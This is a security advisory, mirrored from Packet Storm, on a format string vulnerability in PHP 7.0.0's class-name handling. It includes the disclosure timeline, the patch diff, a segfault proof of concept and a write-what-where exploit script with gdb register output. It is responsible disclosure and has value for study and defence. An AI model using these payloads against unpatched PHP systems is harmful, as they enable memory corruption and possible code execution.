Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHP 7.0.0 Format String

🗓️ 24 Dec 2015 00:00:00Reported by Andrew KramerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

PHP 7.0.0 Format String Vulnerability in Class Name

Code
`Overview  
--------------------------------------------  
A fun little format string vulnerability exists in PHP 7.0.0 due to how   
non-existent class names are handled. From my limited research I   
believe this issue is likely exploitable for full code execution (see   
test script below). This issue does not appear to be present in   
previous PHP versions and has been patched in version 7.0.1. If you   
build a working exploit, drop me a line, I'd love to see (andrew at   
jmpesp dot org). Shout out to the PHP team for fixing this so quickly   
and for building a great product. Greetz to my DSU crew.  
  
  
  
Timeline  
--------------------------------------------  
12/11/2015: Discovered  
12/12/2015: Reported to PHP team  
12/13/2015: Patch accepted and committed  
12/17/2015: PHP 7.0.1 released containing patch  
12/22/2015: Publicly disclosed  
  
  
  
Vulnerability/Patch  
--------------------------------------------  
diff -rup php-7.0.0_old/Zend/zend_execute_API.c   
php-7.0.0_new/Zend/zend_execute_API.c  
--- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000   
-0600  
+++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117   
-0600  
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc  
zend_vspprintf(&message, 0, format, va);  
  
if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {  
- zend_throw_error(exception_ce, message);  
+ zend_throw_error(exception_ce, "%s", message);  
} else {  
zend_error(E_ERROR, "%s", message);  
}  
  
  
  
Proof of Concept #1 (simple segfault)  
--------------------------------------------  
<?php $name="%n%n%n%n%n"; $name::doSomething(); ?>  
  
  
  
Proof of Concept #2 (write-what-where primitive)  
--------------------------------------------  
andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php  
<?php  
ini_set("memory_limit", "4G"); // there's probably a much cleaner way to   
do this  
$rdx = 0x42424242; // what  
$rax = 0x43434343; // where  
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax -   
34)); // your offsets may differ.  
$name::doSomething();  
?>  
  
andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php  
GNU gdb (GDB) 7.10  
Copyright (C) 2015 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later   
<http://gnu.org/licenses/gpl.html>  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show   
copying"  
and "show warranty" for details.  
This GDB was configured as "x86_64-unknown-linux-gnu".  
Type "show configuration" for configuration details.  
For bug reporting instructions, please see:  
<http://www.gnu.org/software/gdb/bugs/>.  
Find the GDB manual and other documentation resources online at:  
<http://www.gnu.org/software/gdb/documentation/>.  
For help, type "help".  
Type "apropos word" to search for commands related to "word"...  
Reading symbols from sapi/cli/php...done.  
(gdb) r /tmp/test.php  
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php  
[Thread debugging using libthread_db enabled]  
Using host libthread_db library "/usr/lib/libthread_db.so.1".  
  
Program received signal SIGSEGV, Segmentation fault.  
0x0000000000672935 in xbuf_format_converter   
(xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001',   
fmt=<optimized out>, ap=0x7fffffffa658)  
at /tmp/php-7.0.0_64/main/spprintf.c:744  
744 *(va_arg(ap, int *)) = is_char? (int)((smart_string   
*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);  
(gdb) i r  
rax 0x43434343 1128481603  
rbx 0x7fffb2800016 140736188121110  
rcx 0x6e 110  
rdx 0x42424242 1111638594  
rsi 0x7fffffff9db0 140737488330160  
rdi 0x7fffffffa658 140737488332376  
rbp 0x1 0x1  
rsp 0x7fffffff9d50 0x7fffffff9d50  
r8 0x7fffffff9db0 140737488330160  
r9 0x7fffb2800016 140736188121110  
r10 0x0 0  
r11 0x0 0  
r12 0x20 32  
r13 0x7fffffffa610 140737488332304  
r14 0x0 0  
r15 0x4242423a 1111638586  
rip 0x672935 0x672935 <xbuf_format_converter+1845>  
eflags 0x10202 [ IF RF ]  
cs 0x33 51  
ss 0x2b 43  
ds 0x0 0  
es 0x0 0  
fs 0x0 0  
gs 0x0 0  
(gdb) x/1i $rip  
=> 0x672935 <xbuf_format_converter+1845>: mov DWORD PTR [rax],edx  
(gdb)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Dec 2015 00:00Current
php 7.0.0format stringvulnerability
23